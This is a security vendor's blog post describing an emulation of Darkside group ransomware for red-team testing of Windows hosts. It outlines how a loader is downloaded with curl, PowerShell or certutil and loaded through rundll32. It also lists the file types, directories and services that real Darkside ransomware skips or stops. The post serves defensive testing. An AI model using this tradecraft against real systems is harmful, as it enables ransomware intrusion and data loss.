• John Lundgren

Attack on Demand: Darkside Group Ransomware Emulation

This guide provides a demonstration and details of the Darkside Group Ransomware Emulation that is a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module.


In May 2021, a cyber threat actor gained access to the network of the Colonial Pipeline Company, and leveraged ransomware-as-a-service (RaaS) capabilities from actors calling themselves the Darkside Group to encrypt the files of the hosts compromised in the network to extort a ransom from the Colonial Pipeline Company. This devastating attack caused a week-long disruption to the operations of the Colonial Pipeline, which transports nearly 45% of the U.S. East Coast fuel supply.

Ransomware attacks like this on organizations of all sizes and industries continue to grow in number and impact. While many cyber threat groups have turned to ransomware operations due to how lucrative it can be, there is not a great deal of variety in the techniques attackers use to encrypt the files on a host. After gaining access to a single host or a larger network through lateral movement techniques, capabilities like the Darkside Group's RaaS will often use a combination of symmetric and asymmetric encryption schemes to encrypt the victim's files, then delete the original versions of each file on the compromised host(s).

More recently, organizations as a whole have been improving their ability to recover from the these attacks by regularly backing up their data. In response, many cyber threat groups employing ransomware tactics are also stealing copies of the files being encrypted and threatening public release of the files, in order to increase the likelihood that a victim organization will pay their ransom.


An attacker has gained initial access to the host you are testing, and now will attempt to encrypt all files the attacker has access to on this host in the same manner as the Darkside Group's RaaS capability, in order to extort your organization for ransom.

Technical Requirements

The host being tested must meet the following technical requirements:

  • Operating System: Microsoft Windows 10

Attack Package Description

The Darkside Ransomware Emulator will start by retrieving a full listing of each file and directory that exists on the host and searching for the first 500 found that has the filetypes (full list below) that the Darkside Group ransomware searched for. The Emulator then makes a copy of those 500 files and stores them in a directory on the Desktop. Next, the copies of the 500 files will be encrypted using a combination of AES-256 and Salsa20 encryption algorithms.

If successful, a pop-up window will launch to notify you that the simulation is complete and that the sample of 500 files have been encrypted.

Safety and Security Details

  • The files that are encrypted as part of this simulation are only copies of the original files, and can be safely deleted by the simulation upon completion without any data loss or disruption to operations on the host being tested.

  • Two tactics used by the Darkside Group that are not included in the Darkside Group Ransomware Emulator are:

  1. Darkside Group Ransomware Emulator does not delete the original versions of these files. Note: While this tactic can be detected by some security solutions, modern ransomware actors typically exfiltrate a victim's files before deleting them, to be able to threaten public release of the files if the ransom is not paid. Therefore, we consider the ransomware simulation to be successful if files on the host are discovered and the sample of 500 are encrypted.

  2. Darkside Group Ransomware Emulator does not stop or disrupt any services. The actual Darkside Group Ransomware searches for the services listed here, and then stops them to increase the effect of their operation and decrease the usability of the affected host.

Attack Package Steps

Once the execution script is run (as a normal user or Administrator), the following actions will occur:

  1. Internet connectivity will be tested by attempting to ping www.breachbits.com .

  2. The BreachBits BlueShadow loader will be downloaded from the BreachBits attack infrastructure using one of the following native Windows utilities:

  3. Curl (only available in recent Windows 10 releases)

  4. Powershell

  5. Certutil

  6. Windows utility rundll32.exe will be used to inject the BlueShadow Dynamic Link Library (DLL) into memory.

  7. Read more about this common execution and defense evasion tactic here: https://attack.mitre.org/techniques/T1218/011/

  8. BlueShadow will download the Darkside Group Ransomware Emulator.

  9. The Emulator will get a full list of all directories and files accessible to the user on the host, make copies of 500 of these files that have the filetypes sought by the Darkside Group payload and store them in a directory on the user's Desktop.

  10. The Darkside Group Ransomware Emulator will generate the AES-256 and Salsa20 encryption keys, then encrypt the 500 file copies using a combination the two encryption algorithms. These files will be saved as .s20 filetype.

  11. A pop-up will launch to indicate the simulation is complete, and where the encrypted files are stored.

Results and Next Steps

Detection and disruption of ransomware threats on hosts can be challenging, even for some of today's most advanced endpoint detection solutions. Regardless if your security solution(s) did or did not detect and stop the Darkside Group Ransomware Emulator, we recommend:

  • Checking to see if your security solution(s) have any ransomware-specific features that may not be implemented, such as marking particular directories, files, etc. as protected. It is possible this will improve your security solution(s)' ability to detect and stop ransomware attacks.

  • Test hosts in your environment with other tactics that can be used in larger-scope ransomware attacks, such as privilege escalation and lateral movement techniques.

  • Ensure your organization has and executes a data-backup policy, to secure sensitive files in a controlled environment. Practice implementing backups periodically, to ensure the duplicated files are stored correctly and your organization's staff is trained and prepared to restore backups.

Technical Details (Source: https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html)

Filetypes ignored by Darkside Group Ransomware (and Darkside Group Ransomware Emulator):

  • .386, .adv, .ani, .bat, .bin, .cab, .cmd, .com, .cpl, .cur, .deskthemepack, .diagcab, .diagcfg, .diagpkg, .dll, .drv, .exe, .hlp, .icl, .icns, .ico, .ics, .idx, .ldf, .lnk, .mod, .mpa, .msc, .msp, .msstyles, .msu, .nls, .nomedia, .ocx, .prf, .ps1, .rom, .rtp, .scr, .shs, .spl, .sys, .theme, .themepack, .wpx, .lock, .key, .hta, .msi, .pdb

Files ignored by Darkside Group Ransomware (and Darkside Group Ransomware Emulator):

  • $recycle.bin

  • config.msi

  • $windows.~bt

  • $windows.~ws

  • autorun.inf

  • boot.ini

  • bootfont.bin

  • bootsect.bak

  • desktop.ini

  • iconcache.db

  • ntldrntuser.dat

  • ntuser.dat

  • logntuser.ini

  • thumbs.db

Directories containing the following search terms ignored by Darkside Group Ransomware (and Darkside Group Ransomware Emulator):

  • windows

  • appdata

  • application data

  • boot

  • google

  • mozilla

  • program files

  • program files (x86)

  • programdata

  • system volume information

  • tor browser

  • windows.old

  • intel

  • msocache

  • perflogs

  • x64dbg

  • public

  • all users

  • default

Services stopped by the Darkside Group Ransomware (but NOT the Darkside Group Ransomware Emulator):

  • vss

  • sql

  • svc$

  • memtas

  • mepocs

  • sophos

  • veeam

  • backup

  • Services containing strings:

  • GxVss

  • GxBlr

  • GxFWD

  • GxCVD

  • GxCIMgr

  • sql

  • oracle

  • ocssd

  • dbsnmp

  • synctime

  • agntsvc

  • isqlplussvc

  • xfssvccon

  • mydesktopservice

  • ocautoupds

  • encsvc

  • firefox

  • tbirdconfig

  • mydesktopqos

  • ocomm

  • dbeng50

  • sqbcoreservice

  • excel

  • infopath

  • msaccess

  • mspub

  • onenote

  • outlook

  • powerpnt

  • steam

  • thebat

  • thunderbird

  • visio

  • winword

  • wordpad

  • notepad

9 views0 comments

Recent Posts

See All

Attack on Demand: BreachBits Ransomware Emulation

This guide provides a demonstration and details of the BreachBits Ransomware Emulation that is a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module. Background Ransomware attacks

Attack on Demand: Credential Access using LSASS

This article provides a demonstration and context for the Credential Access using LSASS Attack on Demand packages that are a part of the Continuous Intelligent Red Team (CIRT) Insider Threat module. B